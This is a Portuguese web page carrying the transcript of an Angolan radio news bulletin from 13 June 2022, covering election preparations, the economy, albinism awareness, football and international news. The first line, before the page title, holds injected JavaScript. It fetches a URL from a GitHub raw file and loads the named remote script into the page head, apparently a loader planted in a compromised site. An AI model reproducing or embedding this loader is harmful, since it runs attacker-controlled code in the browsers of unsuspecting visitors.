;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Edição de 13 de Junho de 2022 | RadioPlayDigital
Edição de 13 de Junho de 2022
 

Mais de duzentos mil eleitorais vão ser formados.

Mais de 14 milhões de angolanos estão aptos para irem as urnas no dia 24 de Agosto.

Executivo prevê que a economia cresça este ano, 2,7 %

Secretário de Estado de Saúde Pública reconhece que são necessários mais apoios para os portadores de albinismo.

Petro de Luanda faz dobradinha, e leva para casa a Taça de Angola em futebol.

Michelle Bachelet descarta, candidatura a um segundo mandato nas Nações Unidas.

Coligação de Emmanuel Macron vence primeira volta com 25,75%

Hoje é segunda-feira, 13 de Junho, Dia Internacional de Consciencialização sobre o Albinismo. A edição noticiosa é de, Albina Dias. A técnica de, Galácio Santana e final de emissão de, Emanuel Catilina. Ao microfone estou eu, Sílvio de Abreu.

O Ficheiro Informático dos Cidadãos Maiores definitivo (FICM) vai ser objecto de auditoria por uma entidade internacional independente, seleccionada mediante concurso público internacional, confirmou hoje, em Luanda, o porta voz da Comissão Nacional Eleitoral (CNE), Lucas Quilundo.

O responsável, que falava após o acto de entrega do FICM ao Tribunal Constitucional (TC) pela CNE, disse que estará igualmente sujeita à auditoria toda a solução tecnológica que está a ser construída para as eleições gerais de 24 Agosto de 2022.

A auditoria ao Ficheiro Informático dos Cidadãos Maiores definitivo será realizada à medida que as soluções tecnológicas forem construídas, até 15 dias antes da realização das eleições gerais, avançou.

Do FICM constam um total de 14 milhões 399 mil e 391 cidadãos eleitores, com a retirada daqueles que não fazem 18 anos até ao dia 24 de Agosto, dos falecidos e dos impedidos de exercer direitos políticos, que constavam do documento inicial.

O período de apresentação de candidaturas para validação pelo TC iniciou-se, a 06 do corrente mês, para encerrar no dia 25 do mesmo mês.

Após essa fase, os partidos políticos candidatos às eleições gerais de 24 Agosto terão 10 dias para o suprimento de eventuais irregularidades ou insuficiências nos processos apresentados.

O MPLA foi a primeira formação política a apresentar a sua candidatura, com a entrega ao TC da listas dos seus 355 candidatos a deputados, a 08 de Junho corrente.

Para além do MPLA, 12 outras formações políticas estão habilitadas a concorrer às próximas eleições gerais, incluindo a UNITA, a FNLA, o PRS, o Bloco Democrático e Aliança Patriótica Nacional. Os outros concorrentes são o P-NJANGO (Partido Nacionalista para Justiça em Angola), o Partido Humanista de Angola (PHA) e a coligação CASA-CE, integrada por cinco partidos.

……..

Duzentos e 20 mil agentes eleitorais serão formados, até à realização das eleições gerais de 24 de Agosto, pela Comissão Nacional Eleitoral (CNE). Os dados foram revelados esta segunda-feira, em Luanda, pelo presidente da CNE, Manuel Pereira da Silva, na abertura da acção de formação para formadores nacionais de agentes cívicos eleitorais.

Ao intervir no acto, afirmou que ela visa dotar os participantes de conhecimentos sólidos sobre os conteúdos constantes do Manual do Agente de Educação Cívica e Eleitoral, bem como uniformizar as interpretações a serem transmitidas aos agentes que entrarão em contacto directo com os eleitores até ao dia 24 de Agosto.

Segundo Manuel da Silva, o círculo de formação abrange 220 mil agentes eleitorais, com destaque para formadores nacionais, provinciais, municipais, agentes de educação cívica eleitoral e membros das assembleias e mesas de voto.

Disse que os  mesmos foram selecionados com base em concursos públicos curriculares, em obediência aos princípios da independência, isenção, transparência e imparcialidade.

Na ocasião, o presidente da CNE apelou aos formandos “a saberem escutar” para melhor apreenderem os conhecimentos que serão transmitidos aos futuros participantes em acções do género.

Participam na acção formativa presidentes das comissões provinciais eleitorais, comissários eleitorais nacionais, entre outros.

Catorze milhões, trezentos e noventa e nove mil cidadãos, estão habilitados a votar nas eleições gerais de Agosto próximo.

O número consta do Ficheiro Informático dos Cidadãos Maiores, cuja cópia definita foi entregue hoje à Comissão Nacional Eleitoral e que compila os dados recolhidos durante o período de registo oficioso.

O ministro da Administração do Território, que falava hoje na sede da CNE, esclareceu que estão excluídos do universo de votantes, a população carcerária e aqueles que só atingem a maioridade depois de 24 de Agosto.

Marcy Lopes, disse ainda que quanto ao voto na diáspora, a prioridade foi para os países com as maiores concentrações de angolanos.

Ministro da Administração do Território, Marcy Lopes, durante a cerimónia de entrega à CNE, da cópia definitiva do Ficheiro Informático dos Cidadãos Maiores.

O documento, segue a seguir para o Tribunal Constitucional.

Mais de 14 milhões de angolanos estão aptos para irem as urnas no dia 24 de Agosto.

O Executivo espera que a economia angolana cresça este ano 2.7 porcento. Esta previsão foi apresentada pelo Ministro de Estado para a Coordenação Económica, na semana passada, durante a cerimónia oficial de admissão do banco BAI na Bolsa de Dívida e Valores de Angola (BODIVA).

Segundo Manuel Nunes Júnior, o crescimento da economia esperado para este ano é sustentável e segue a tendência do ano passado.

O Ministro de Estado para a Coordenação Económica disse também que no ano passado, a saída do país de cinco recessões seguidas, foi suportada pelo crescimento do sector não petrolífero.

Para Manuel Nunes Júnior, os resultados positivos da economia nacional devem-se a implementação do programa macroeconómico iniciado em 2018.

Ministro de Estado para a Coordenação Económica Manuel Nunes Júnior e economia nacional que este ano tem previsão de crescimento de 2.7 porcento.

O quotidiano das pessoas portadores de albinismo em Angola, ainda é marcado pela estigmatização, ausência de apoio no acesso às consultas de oftalmologia, dermatologia e oncologia e dificuldades no acesso ao mercado laboral.

O facto foi revelado à LAC, por Benvinda Esperança, da Associação de apoio às pessoas com albinismo, que referiu a necessidade da mudança de mentalidade para que esta franja da sociedade possa usufruir em pleno dos seus direitos.

 

Benvinda esperança revelou ainda que nem mesmo alguns professores estão preparados para lidar com os portadores de albinismo, e sublinhou que são pessoas capacitadas e prontas a darem o seu contributo para o desenvolvimento do país.

Por sua vez, Telmo Martins, também portador de albinismo, disse à Comercial que para si, o dia de hoje representa a continuidade da luta pela salvaguarda de interesses de outras pessoas na sua condição, e apelou à mobilização de todos, para que os problemas não sejam só aflorados durante as jornadas de reflexão da efeméride que hoje se assinala.

No caso de Telmo Martins, o albinismo não impediu a sua inserção no mercado de trabalho, mas admite que existem sim descriminação.

Telmo Martins portador de albinismo, em declarações hoje à Comercial.

E durante a cerimónia de abertura das jornadas de consciencialização do albinismo, cuja efeméride se assinala hoje em todo o mundo, o secretário de estado para a saúde pública,  Franco Mufinda revelou que existem no país cerca de mil e quatrocentas pessoas com albinismo que enfrentam múltiplas dificuldades que urge resolver e sobretudo acabar com os mitos.

Franco Mufinda referiu-se a grande probabilidade dos portadores de albinismo desenvolverem cancros de pele e outras patologias, a morte precoce de muitos, e reconheceu que os apoios que recebem são insuficientes.

E a secretária de estado para a família e promoção da mulher, Elsa Barber deu a conhecer que fruto das políticas públicas de inserção das franjas vulneráveis, está a ser criada uma base de dados sobre os portadores de albinismo.

Secretária de estado para a promoção da mulher, Elsa Barber quando falava durante a abertura das jornadas de consciencialização sobre o albinismo.

A efeméride que hoje se assinala à escala mundial prevê a realização na Mediateca de uma mesa redonda sobre as políticas públicas de inserção de pessoas com albinismo, e no próximo dia 18, uma outra sobre o cancro da pele.

Do Desporto,

Petro de Luanda conquistou ontem a Taça de Angola em Futebol, com a victória por 2-1, diante do Desportivo da Huíla, numa partida decidida no prolongamento.

Com a victória de ontem os petrolíferos somam o seu décimo segundo título da Taça de Angola  e levantaram o segundo troféu este ano, depois de vencerem o Girabola

Para o comentador Manecas Leitão o Petro de Luanda foi um justo vencedor, pelo que fez ao longo da época.

Comentador Manecas Leitão. Petro conquista Taça de Angola e faz dobradinha em futebol.

….

Da actualidade Internacional,

A alta-comissária das Nações Unidas para os Direitos Humanos (ACNUDH), Michelle Bachelet, anunciou hoje que não vai recandidatar-se  a um segundo mandato, após o dia, 31 de agosto.

“Numa altura em que o meu mandato chega ao fim, esta 50.ª sessão do Conselho será a última em que falarei”, disse a ex-presidente chilena, de 70 anos, na sessão de abertura do Conselho dos Direitos Humanos das Nações Unidas, que hoje arrancou em Genebra, na Suíça.

A porta-voz do ACNUDH, Ravina Shamdasani, citada pela agência Associated Press, confirmou que Bachelet não irá procurar um segundo mandato de quatro anos quando o atual terminar em 31 de agosto.

O atual mandato de Bachelet foi recentemente ensombrado pelas críticas à sua resposta ao tratamento dado pela China aos uigures e outras minorias muçulmanas.

A coligação do partido do Presidente Emmanuel Macron ganhou ontem, a primeira volta das eleições legislativas em França, ficando em segundo lugar a coligação de esquerda.

De acordo com os resultados finais divulgados durante a noite, a coligação Ensemble!, de Emmanuel Macron, obteve 5.857.557 votos (25,75%), seguida de perto pela coligação de esquerda Nova União Popular Ecologista e Social (Nupes), com 5.836.116 votos (25,66%).

Significa que apenas 21.441votos separam as duas coligações, nas eleições de domingo.

Segundo os dados do Ministério do Interior de França, em terceiro lugar ficou a União Nacional, de Marine Le Pen, extrema-direita, com 4.248.600 votos (18,68%).

Na quarta posição, com 2.370.882 votos (10,42%), ficaram os republicanos, e em quinto lugar, com 964.865 votos (4,24%), o Reconquista!, um partido de extrema-direita.

Pedro N’Guvulo, esteve recentemente em Luanda, para estabelecer contactos, que lhe permitam editar o seu livro intitulado ‘Isla de La Juventude-Memórias de Um Bolseiro em Cuba’, que já foi apresentada oficialmente em finais de Maio passado, na Embaixada angolana em Londres. O prefácio do livro é assinado pelo actual embaixador no Reino Unido, o general Sachipengo Nunda.

A LAC aproveitou a estadia de Pedro N’Guvulo por Luanda, para se informar sobre as expectativas da diáspora angolana por terras de Sua Majestade, que à semelhança de outras radicadas em vários países, exercerão pela primeira vez o seu direito de voto, no próximo mês de Agosto.

O autor, falou ainda do pepel da cultura em particular a Música, no reforço da identidade angolana além-fronteiras; as áreas em que Angola pode tirar partido das relações económicas com o Reino Unido depois da sua saída do espaço da União Europeia; e, da melhoria das políticas do Estado que permitam o regresso definitivo dos ‘cérebros angolanos’ que estão desejosos de participar no esforço de reconstrução do país.

……….

Acabamos de ouvir a entrevista concedida recentemente à LAC pelo angolano economista angolano Pedro N’Guvulo, residente em Londres desde o início da década de noventa, também autor do livro denominado, ‘Isla de La Juventude-Memórias de Um Bolseiro em Cuba’, apresentado oficialmente na Embaixada angolana em Londres no final do passado mês de Maio, cujo prefácio foi escrito pelo nosso Embaixador no Reino Unido, o general Sachipengo Nunda.

 

 

 

Data de Emissão: 13-06-2022 às 19:00
Género(s): Noticiário
 

Relacionados